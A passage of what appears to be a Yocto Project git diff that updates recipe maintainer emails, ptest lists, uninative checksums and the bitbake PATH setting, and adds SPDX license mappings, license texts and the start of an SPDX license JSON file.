-RECIPE_MAINTAINER_pn-lzip = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-lzop = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-lz4 = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-lzo = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-lzip = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-lzop = "Denys Dmytriyenko <denys@denix.org>"
 RECIPE_MAINTAINER_pn-m4 = "Robert Yang <liezhi.yang@windriver.com>"
 RECIPE_MAINTAINER_pn-m4-native = "Robert Yang <liezhi.yang@windriver.com>"
 RECIPE_MAINTAINER_pn-make = "Robert Yang <liezhi.yang@windriver.com>"
@@ -501,7 +501,7 @@ RECIPE_MAINTAINER_pn-mpeg2dec = "Alexander Kanavin <alex.kanavin@gmail.com>"
 RECIPE_MAINTAINER_pn-mpfr = "Khem Raj <raj.khem@gmail.com>"
 RECIPE_MAINTAINER_pn-mpg123 = "Alexander Kanavin <alex.kanavin@gmail.com>"
 RECIPE_MAINTAINER_pn-msmtp = "Alexander Kanavin <alex.kanavin@gmail.com>"
-RECIPE_MAINTAINER_pn-mtd-utils = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-mtd-utils = "Denys Dmytriyenko <denys@denix.org>"
 RECIPE_MAINTAINER_pn-mtdev = "Anuj Mittal <anuj.mittal@intel.com>"
 RECIPE_MAINTAINER_pn-mtools = "Anuj Mittal <anuj.mittal@intel.com>"
 RECIPE_MAINTAINER_pn-musl = "Khem Raj <raj.khem@gmail.com>"
@@ -545,7 +545,7 @@ RECIPE_MAINTAINER_pn-pango = "Ross Burton <ross.burton@arm.com>"
 RECIPE_MAINTAINER_pn-parted = "Hongxu Jia <hongxu.jia@windriver.com>"
 RECIPE_MAINTAINER_pn-patch = "Hongxu Jia <hongxu.jia@windriver.com>"
 RECIPE_MAINTAINER_pn-patchelf = "Richard Purdie <richard.purdie@linuxfoundation.org>"
-RECIPE_MAINTAINER_pn-pbzip2 = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-pbzip2 = "Denys Dmytriyenko <denys@denix.org>"
 RECIPE_MAINTAINER_pn-pciutils = "Chen Qi <Qi.Chen@windriver.com>"
 RECIPE_MAINTAINER_pn-pcmanfm = "Alexander Kanavin <alex.kanavin@gmail.com>"
 RECIPE_MAINTAINER_pn-perf = "Bruce Ashfield <bruce.ashfield@gmail.com>"
@@ -576,6 +576,7 @@ RECIPE_MAINTAINER_pn-python3 = "Oleksandr Kravchuk <open.source@oleksandr-kravch
 RECIPE_MAINTAINER_pn-python3-async = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>"
 RECIPE_MAINTAINER_pn-python3-dbus = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>"
 RECIPE_MAINTAINER_pn-python3-docutils = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>"
+RECIPE_MAINTAINER_pn-python3-dtschema-wrapper = "Bruce Ashfield <bruce.ashfield@gmail.com>"
 RECIPE_MAINTAINER_pn-python3-pycryptodome = "Joshua Watt <JPEWhacker@gmail.com>"
 RECIPE_MAINTAINER_pn-python3-pycryptodomex = "Joshua Watt <JPEWhacker@gmail.com>"
 RECIPE_MAINTAINER_pn-python3-extras = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>"
@@ -661,9 +662,9 @@ RECIPE_MAINTAINER_pn-systemd-conf = "Chen Qi <Qi.Chen@windriver.com>"
 RECIPE_MAINTAINER_pn-systemd-compat-units = "Chen Qi <Qi.Chen@windriver.com>"
 RECIPE_MAINTAINER_pn-systemd-serialgetty = "Chen Qi <Qi.Chen@windriver.com>"
 RECIPE_MAINTAINER_pn-systemd-systemctl-native = "Chen Qi <Qi.Chen@windriver.com>"
-RECIPE_MAINTAINER_pn-systemtap = "Victor Kamensky <kamensky@cisco.com>"
-RECIPE_MAINTAINER_pn-systemtap-native = "Victor Kamensky <kamensky@cisco.com>"
-RECIPE_MAINTAINER_pn-systemtap-uprobes = "Victor Kamensky <kamensky@cisco.com>"
+RECIPE_MAINTAINER_pn-systemtap = "Victor Kamensky <victor.kamensky7@gmail.com>"
+RECIPE_MAINTAINER_pn-systemtap-native = "Victor Kamensky <victor.kamensky7@gmail.com>"
+RECIPE_MAINTAINER_pn-systemtap-uprobes = "Victor Kamensky <victor.kamensky7@gmail.com>"
 RECIPE_MAINTAINER_pn-sysvinit = "Ross Burton <ross.burton@arm.com>"
 RECIPE_MAINTAINER_pn-sysvinit-inittab = "Ross Burton <ross.burton@arm.com>"
 RECIPE_MAINTAINER_pn-taglib = "Anuj Mittal <anuj.mittal@intel.com>"
@@ -685,7 +686,7 @@ RECIPE_MAINTAINER_pn-udev-extraconf = "Ross Burton <ross.burton@arm.com>"
 RECIPE_MAINTAINER_pn-unfs3 = "Ross Burton <ross.burton@arm.com>"
 RECIPE_MAINTAINER_pn-unifdef = "Ross Burton <ross.burton@arm.com>"
 RECIPE_MAINTAINER_pn-uninative-tarball = "Richard Purdie <richard.purdie@linuxfoundation.org>"
-RECIPE_MAINTAINER_pn-unzip = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-unzip = "Denys Dmytriyenko <denys@denix.org>"
 RECIPE_MAINTAINER_pn-update-rc.d = "Ross Burton <ross.burton@arm.com>"
 RECIPE_MAINTAINER_pn-usbinit = "Alexander Kanavin <alex.kanavin@gmail.com>"
 RECIPE_MAINTAINER_pn-usbutils = "Alexander Kanavin <alex.kanavin@gmail.com>"
@@ -706,11 +707,11 @@ RECIPE_MAINTAINER_pn-vulkan-tools = "Anuj Mittal <anuj.mittal@intel.com>"
 RECIPE_MAINTAINER_pn-waffle = "Ross Burton <ross.burton@arm.com>"
 RECIPE_MAINTAINER_pn-watchdog = "Alexander Kanavin <alex.kanavin@gmail.com>"
 RECIPE_MAINTAINER_pn-watchdog-config = "Alexander Kanavin <alex.kanavin@gmail.com>"
-RECIPE_MAINTAINER_pn-wayland = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-wayland-protocols = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-wayland = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-wayland-protocols = "Denys Dmytriyenko <denys@denix.org>"
 RECIPE_MAINTAINER_pn-webkitgtk = "Alexander Kanavin <alex.kanavin@gmail.com>"
-RECIPE_MAINTAINER_pn-weston = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-weston-init = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-weston = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-weston-init = "Denys Dmytriyenko <denys@denix.org>"
 RECIPE_MAINTAINER_pn-wget = "Yi Zhao <yi.zhao@windriver.com>"
 RECIPE_MAINTAINER_pn-which = "Anuj Mittal <anuj.mittal@intel.com>"
 RECIPE_MAINTAINER_pn-wic-tools = "Anuj Mittal <anuj.mittal@intel.com>"
@@ -764,6 +765,6 @@ RECIPE_MAINTAINER_pn-xtrans = "Armin Kuster <akuster808@gmail.com>"
 RECIPE_MAINTAINER_pn-xuser-account = "Armin Kuster <akuster808@gmail.com>"
 RECIPE_MAINTAINER_pn-xvinfo = "Armin Kuster <akuster808@gmail.com>"
 RECIPE_MAINTAINER_pn-xwininfo = "Armin Kuster <akuster808@gmail.com>"
-RECIPE_MAINTAINER_pn-xz = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-zip = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-zlib = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-xz = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-zip = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-zlib = "Denys Dmytriyenko <denys@denix.org>"
diff --git a/meta/conf/distro/include/ptest-packagelists.inc b/meta/conf/distro/include/ptest-packagelists.inc
index c13ff724b1..3fb7ec2657 100644
--- a/meta/conf/distro/include/ptest-packagelists.inc
+++ b/meta/conf/distro/include/ptest-packagelists.inc
@@ -26,6 +26,7 @@ PTESTS_FAST = "\
     liberror-perl-ptest \
     libmodule-build-perl-ptest \
     libpcre-ptest \
+    libpng-ptest \
     libtimedate-perl-ptest \
     libtest-needs-perl-ptest \
     liburi-perl-ptest \
@@ -60,6 +61,7 @@ PTESTS_FAST = "\
 #    bash-ptest \ # Test outcomes are non-deterministic by design
 #    ifupdown-ptest \ # Tested separately in lib/oeqa/selftest/cases/imagefeatures.py
 #    mdadm-ptest \ # Tests rely on non-deterministic sleep() amounts
+#    libinput-ptest \ # Tests need an unloaded system to be reliable
 #"
 
 PTESTS_SLOW = "\
diff --git a/meta/conf/distro/include/yocto-uninative.inc b/meta/conf/distro/include/yocto-uninative.inc
index 69b6edee5f..4ac66fd506 100644
--- a/meta/conf/distro/include/yocto-uninative.inc
+++ b/meta/conf/distro/include/yocto-uninative.inc
@@ -6,9 +6,10 @@
 # to the distro running on the build machine.
 #
 
-UNINATIVE_MAXGLIBCVERSION = "2.32"
+UNINATIVE_MAXGLIBCVERSION = "2.39"
+UNINATIVE_VERSION = "4.4"
 
-UNINATIVE_URL ?= "http://downloads.yoctoproject.org/releases/uninative/2.9/"
-UNINATIVE_CHECKSUM[aarch64] ?= "9f25a667aee225b1dd65c4aea73e01983e825b1cb9b56937932a1ee328b45f81"
-UNINATIVE_CHECKSUM[i686] ?= "cae5d73245d95b07cf133b780ba3f6c8d0adca3ffc4e7e7fab999961d5e24d36"
-UNINATIVE_CHECKSUM[x86_64] ?= "d07916b95c419c81541a19c8ef0ed8cbd78ae18437ff28a4c8a60ef40518e423"
+UNINATIVE_URL ?= "http://downloads.yoctoproject.org/releases/uninative/${UNINATIVE_VERSION}/"
+UNINATIVE_CHECKSUM[aarch64] ?= "b61876130f494f75092f21086b4a64ea5fb064045769bf1d32e9cb6af17ea8ec"
+UNINATIVE_CHECKSUM[i686] ?= "9f28627828f0082cc0344eede4d9a861a9a064bfa8f36e072e46212f0fe45fcc"
+UNINATIVE_CHECKSUM[x86_64] ?= "d81c54284be2bb886931fc87281d58177a2cd381cf99d1981f8923039a72a302"
diff --git a/meta/conf/layer.conf b/meta/conf/layer.conf
index 0249f21d07..7453655417 100644
--- a/meta/conf/layer.conf
+++ b/meta/conf/layer.conf
@@ -100,4 +100,6 @@ SSTATE_EXCLUDEDEPS_SYSROOT += "\
 SSTATE_EXCLUDEDEPS_SYSROOT += ".*->autoconf-archive-native"
 
 # We need to keep bitbake tools in PATH
-PATH := "${@os.path.dirname(bb.utils.which(d.getVar('PATH'),'bitbake'))}:${HOSTTOOLS_DIR}"
+# Avoid empty path entries
+BITBAKEPATH := "${@os.path.dirname(bb.utils.which(d.getVar('PATH'),'bitbake'))}"
+PATH := "${@'${BITBAKEPATH}:' if '${BITBAKEPATH}' != '' else ''}${HOSTTOOLS_DIR}"
diff --git a/meta/conf/licenses.conf b/meta/conf/licenses.conf
index 5b309eb385..c78823e847 100644
--- a/meta/conf/licenses.conf
+++ b/meta/conf/licenses.conf
@@ -13,24 +13,39 @@
 SPDXLICENSEMAP[AGPL-3] = "AGPL-3.0"
 SPDXLICENSEMAP[AGPLv3] = "AGPL-3.0"
 SPDXLICENSEMAP[AGPLv3.0] = "AGPL-3.0"
+SPDXLICENSEMAP[AGPL-3.0-only] = "AGPL-3.0"
 
 # GPL variations
 SPDXLICENSEMAP[GPL-1] = "GPL-1.0"
 SPDXLICENSEMAP[GPLv1] = "GPL-1.0"
 SPDXLICENSEMAP[GPLv1.0] = "GPL-1.0"
+SPDXLICENSEMAP[GPL-1.0-only] = "GPL-1.0"
 SPDXLICENSEMAP[GPL-2] = "GPL-2.0"
 SPDXLICENSEMAP[GPLv2] = "GPL-2.0"
+SPDXLICENSEMAP[GPLv2+] = "GPL-2.0+"
 SPDXLICENSEMAP[GPLv2.0] = "GPL-2.0"
+SPDXLICENSEMAP[GPLv2.0+] = "GPL-2.0+"
+SPDXLICENSEMAP[GPL-2.0-only] = "GPL-2.0"
 SPDXLICENSEMAP[GPL-3] = "GPL-3.0"
 SPDXLICENSEMAP[GPLv3] = "GPL-3.0"
+SPDXLICENSEMAP[GPLv3+] = "GPL-3.0+"
 SPDXLICENSEMAP[GPLv3.0] = "GPL-3.0"
+SPDXLICENSEMAP[GPLv3.0+] = "GPL-3.0+"
+SPDXLICENSEMAP[GPL-3.0-only] = "GPL-3.0"
 
 #LGPL variations
 SPDXLICENSEMAP[LGPLv2] = "LGPL-2.0"
+SPDXLICENSEMAP[LGPLv2+] = "LGPL-2.0+"
 SPDXLICENSEMAP[LGPLv2.0] = "LGPL-2.0"
+SPDXLICENSEMAP[LGPLv2.0+] = "LGPL-2.0+"
+SPDXLICENSEMAP[LGPL-2.0-only] = "LGPL-2.0"
 SPDXLICENSEMAP[LGPL2.1] = "LGPL-2.1"
 SPDXLICENSEMAP[LGPLv2.1] = "LGPL-2.1"
+SPDXLICENSEMAP[LGPLv2.1+] = "LGPL-2.1+"
+SPDXLICENSEMAP[LGPL-2.1-only] = "LGPL-2.1"
 SPDXLICENSEMAP[LGPLv3] = "LGPL-3.0"
+SPDXLICENSEMAP[LGPLv3+] = "LGPL-3.0+"
+SPDXLICENSEMAP[LGPL-3.0-only] = "LGPL-3.0"
 
 #MPL variations
 SPDXLICENSEMAP[MPL-1] = "MPL-1.0"
diff --git a/meta/conf/machine/include/qemu.inc b/meta/conf/machine/include/qemu.inc
index 8dedb1a42d..7d0a6fe458 100644
--- a/meta/conf/machine/include/qemu.inc
+++ b/meta/conf/machine/include/qemu.inc
@@ -21,7 +21,7 @@ RDEPENDS_${KERNEL_PACKAGE_NAME}-base = ""
 # Use a common kernel recipe for all QEMU machines
 PREFERRED_PROVIDER_virtual/kernel ??= "linux-yocto"
 
-EXTRA_IMAGEDEPENDS += "qemu-native qemu-helper-native"
+EXTRA_IMAGEDEPENDS += "qemu-system-native qemu-helper-native"
 
 # Provide the nfs server kernel module for all qemu images
 KERNEL_FEATURES_append_pn-linux-yocto = " features/nfsd/nfsd-enable.scc"
diff --git a/meta/conf/multilib.conf b/meta/conf/multilib.conf
index d231107f8b..e9767c73b6 100644
--- a/meta/conf/multilib.conf
+++ b/meta/conf/multilib.conf
@@ -11,6 +11,8 @@ STAGING_DIR_TARGET = "${WORKDIR}/${MLPREFIX}recipe-sysroot"
 RECIPE_SYSROOT = "${WORKDIR}/${MLPREFIX}recipe-sysroot"
 RECIPE_SYSROOT_class-native = "${WORKDIR}/recipe-sysroot"
 
+PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/${MLPREFIX}recipe-sysroot"
+
 INHERIT += "multilib_global"
 
 BBCLASSEXTEND_append = " ${MULTILIBS}"
diff --git a/meta/files/common-licenses/Spencer-94 b/meta/files/common-licenses/Spencer-94
new file mode 100644
index 0000000000..75ba7f7d2e
--- /dev/null
+++ b/meta/files/common-licenses/Spencer-94
@@ -0,0 +1,12 @@
+Copyright 1992, 1993, 1994 Henry Spencer.  All rights reserved.
+This software is not subject to any license of the American Telephone and Telegraph Company or of the Regents of the University of California.
+
+Permission is granted to anyone to use this software for any purpose on any computer system, and to alter it and redistribute it, subject to the following restrictions:
+
+1. The author is not responsible for the consequences of use of this software, no matter how awful, even if they arise from flaws in it.
+
+2. The origin of this software must not be misrepresented, either by explicit claim or by omission.  Since few users ever read sources, credits must appear in the documentation.
+
+3. Altered versions must be plainly marked as such, and must not be misrepresented as being the original software.  Since few users ever read sources, credits must appear in the documentation.
+
+4. This notice may not be removed or altered.
diff --git a/meta/files/common-licenses/Unlicense b/meta/files/common-licenses/Unlicense
new file mode 100644
index 0000000000..68a49daad8
--- /dev/null
+++ b/meta/files/common-licenses/Unlicense
@@ -0,0 +1,24 @@
+This is free and unencumbered software released into the public domain.
+
+Anyone is free to copy, modify, publish, use, compile, sell, or
+distribute this software, either in source code form or as a compiled
+binary, for any purpose, commercial or non-commercial, and by any
+means.
+
+In jurisdictions that recognize copyright laws, the author or authors
+of this software dedicate any and all copyright interest in the
+software to the public domain. We make this dedication for the benefit
+of the public at large and to the detriment of our heirs and
+successors. We intend this dedication to be an overt act of
+relinquishment in perpetuity of all present and future rights to this
+software under copyright law.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
+IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
+OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
+ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
+OTHER DEALINGS IN THE SOFTWARE.
+
+For more information, please refer to <http://unlicense.org/>
diff --git a/meta/files/fs-perms-persistent-log.txt b/meta/files/fs-perms-persistent-log.txt
index 3a7cf3ab94..518c1be3c9 100644
--- a/meta/files/fs-perms-persistent-log.txt
+++ b/meta/files/fs-perms-persistent-log.txt
@@ -41,7 +41,7 @@ ${includedir}		0755	root	root	true	0644	root	root
 ${oldincludedir}	0755	root	root	true	0644	root	root
 
 # Cleanup debug src
-/usr/src/debug		0755	root	root	true	-	root	root
+/usr/src/debug		0755	root	root	true	0644	root	root
 
 # Items from base-files
 # Links
diff --git a/meta/files/fs-perms.txt b/meta/files/fs-perms.txt
index c8c3ac5dbe..daa4aed840 100644
--- a/meta/files/fs-perms.txt
+++ b/meta/files/fs-perms.txt
@@ -41,7 +41,7 @@ ${includedir}		0755	root	root	true	0644	root	root
 ${oldincludedir}	0755	root	root	true	0644	root	root
 
 # Cleanup debug src
-/usr/src/debug		0755	root	root	true	-	root	root
+/usr/src/debug		0755	root	root	true	0644	root	root
 
 # Items from base-files
 # Links
diff --git a/meta/files/spdx-licenses.json b/meta/files/spdx-licenses.json
new file mode 100644
index 0000000000..ef926164ec
--- /dev/null
+++ b/meta/files/spdx-licenses.json
@@ -0,0 +1,5937 @@
+{
+  "licenseListVersion": "3.14",
+  "licenses": [
+    {
+      "reference": "https://spdx.org/licenses/GPL-1.0.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/GPL-1.0.json",
+      "referenceNumber": 0,
+      "name": "GNU General Public License v1.0 only",
+      "licenseId": "GPL-1.0",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/gpl-1.0-standalone.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/bzip2-1.0.6.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/bzip2-1.0.6.json",
+      "referenceNumber": 1,
+      "name": "bzip2 and libbzip2 License v1.0.6",
+      "licenseId": "bzip2-1.0.6",
+      "seeAlso": [
+        "https://sourceware.org/git/?p\u003dbzip2.git;a\u003dblob;f\u003dLICENSE;hb\u003dbzip2-1.0.6",
+        "http://bzip.org/1.0.5/bzip2-manual-1.0.5.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Intel-ACPI.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Intel-ACPI.json",
+      "referenceNumber": 2,
+      "name": "Intel ACPI Software License Agreement",
+      "licenseId": "Intel-ACPI",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Intel_ACPI_Software_License_Agreement"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/XSkat.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/XSkat.json",
+      "referenceNumber": 3,
+      "name": "XSkat License",
+      "licenseId": "XSkat",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/XSkat_License"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-NC-SA-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-2.0.json",
+      "referenceNumber": 4,
+      "name": "Creative Commons Attribution Non Commercial Share Alike 2.0 Generic",
+      "licenseId": "CC-BY-NC-SA-2.0",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-nc-sa/2.0/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Plexus.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Plexus.json",
+      "referenceNumber": 5,
+      "name": "Plexus Classworlds License",
+      "licenseId": "Plexus",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Plexus_Classworlds_License"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Giftware.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Giftware.json",
+      "referenceNumber": 6,
+      "name": "Giftware License",
+      "licenseId": "Giftware",
+      "seeAlso": [
+        "http://liballeg.org/license.html#allegro-4-the-giftware-license"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/BitTorrent-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/BitTorrent-1.0.json",
+      "referenceNumber": 7,
+      "name": "BitTorrent Open Source License v1.0",
+      "licenseId": "BitTorrent-1.0",
+      "seeAlso": [
+        "http://sources.gentoo.org/cgi-bin/viewvc.cgi/gentoo-x86/licenses/BitTorrent?r1\u003d1.1\u0026r2\u003d1.1.1.1\u0026diff_format\u003ds"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/APSL-1.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/APSL-1.1.json",
+      "referenceNumber": 8,
+      "name": "Apple Public Source License 1.1",
+      "licenseId": "APSL-1.1",
+      "seeAlso": [
+        "http://www.opensource.apple.com/source/IOSerialFamily/IOSerialFamily-7/APPLE_LICENSE"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/GPL-2.0-with-GCC-exception.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-GCC-exception.json",
+      "referenceNumber": 9,
+      "name": "GNU General Public License v2.0 w/GCC Runtime Library exception",
+      "licenseId": "GPL-2.0-with-GCC-exception",
+      "seeAlso": [
+        "https://gcc.gnu.org/git/?p\u003dgcc.git;a\u003dblob;f\u003dgcc/libgcc1.c;h\u003d762f5143fc6eed57b6797c82710f3538aa52b40b;hb\u003dcb143a3ce4fb417c68f5fa2691a1b1b1053dfba9#l10"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/UPL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/UPL-1.0.json",
+      "referenceNumber": 10,
+      "name": "Universal Permissive License v1.0",
+      "licenseId": "UPL-1.0",
+      "seeAlso": [
+        "https://opensource.org/licenses/UPL"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/wxWindows.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/wxWindows.json",
+      "referenceNumber": 11,
+      "name": "wxWindows Library License",
+      "licenseId": "wxWindows",
+      "seeAlso": [
+        "https://opensource.org/licenses/WXwindows"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Caldera.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Caldera.json",
+      "referenceNumber": 12,
+      "name": "Caldera License",
+      "licenseId": "Caldera",
+      "seeAlso": [
+        "http://www.lemis.com/grog/UNIX/ancient-source-all.pdf"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Zend-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Zend-2.0.json",
+      "referenceNumber": 13,
+      "name": "Zend License v2.0",
+      "licenseId": "Zend-2.0",
+      "seeAlso": [
+        "https://web.archive.org/web/20130517195954/http://www.zend.com/license/2_00.txt"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/CUA-OPL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CUA-OPL-1.0.json",
+      "referenceNumber": 14,
+      "name": "CUA Office Public License v1.0",
+      "licenseId": "CUA-OPL-1.0",
+      "seeAlso": [
+        "https://opensource.org/licenses/CUA-OPL-1.0"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/JPNIC.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/JPNIC.json",
+      "referenceNumber": 15,
+      "name": "Japan Network Information Center License",
+      "licenseId": "JPNIC",
+      "seeAlso": [
+        "https://gitlab.isc.org/isc-projects/bind9/blob/master/COPYRIGHT#L366"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/SAX-PD.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/SAX-PD.json",
+      "referenceNumber": 16,
+      "name": "Sax Public Domain Notice",
+      "licenseId": "SAX-PD",
+      "seeAlso": [
+        "http://www.saxproject.org/copying.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-ND-2.5.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-2.5.json",
+      "referenceNumber": 17,
+      "name": "Creative Commons Attribution No Derivatives 2.5 Generic",
+      "licenseId": "CC-BY-ND-2.5",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-nd/2.5/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/eGenix.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/eGenix.json",
+      "referenceNumber": 18,
+      "name": "eGenix.com Public License 1.1.0",
+      "licenseId": "eGenix",
+      "seeAlso": [
+        "http://www.egenix.com/products/eGenix.com-Public-License-1.1.0.pdf",
+        "https://fedoraproject.org/wiki/Licensing/eGenix.com_Public_License_1.1.0"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/LGPLLR.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/LGPLLR.json",
+      "referenceNumber": 19,
+      "name": "Lesser General Public License For Linguistic Resources",
+      "licenseId": "LGPLLR",
+      "seeAlso": [
+        "http://www-igm.univ-mlv.fr/~unitex/lgpllr.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/OLDAP-2.2.2.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OLDAP-2.2.2.json",
+      "referenceNumber": 20,
+      "name": "Open LDAP Public License 2.2.2",
+      "licenseId": "OLDAP-2.2.2",
+      "seeAlso": [
+        "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003ddf2cc1e21eb7c160695f5b7cffd6296c151ba188"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-ND-3.0-DE.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-3.0-DE.json",
+      "referenceNumber": 21,
+      "name": "Creative Commons Attribution No Derivatives 3.0 Germany",
+      "licenseId": "CC-BY-ND-3.0-DE",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-nd/3.0/de/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/IPA.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/IPA.json",
+      "referenceNumber": 22,
+      "name": "IPA Font License",
+      "licenseId": "IPA",
+      "seeAlso": [
+        "https://opensource.org/licenses/IPA"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/NCSA.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/NCSA.json",
+      "referenceNumber": 23,
+      "name": "University of Illinois/NCSA Open Source License",
+      "licenseId": "NCSA",
+      "seeAlso": [
+        "http://otm.illinois.edu/uiuc_openSource",
+        "https://opensource.org/licenses/NCSA"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/W3C.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/W3C.json",
+      "referenceNumber": 24,
+      "name": "W3C Software Notice and License (2002-12-31)",
+      "licenseId": "W3C",
+      "seeAlso": [
+        "http://www.w3.org/Consortium/Legal/2002/copyright-software-20021231.html",
+        "https://opensource.org/licenses/W3C"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Adobe-2006.html",
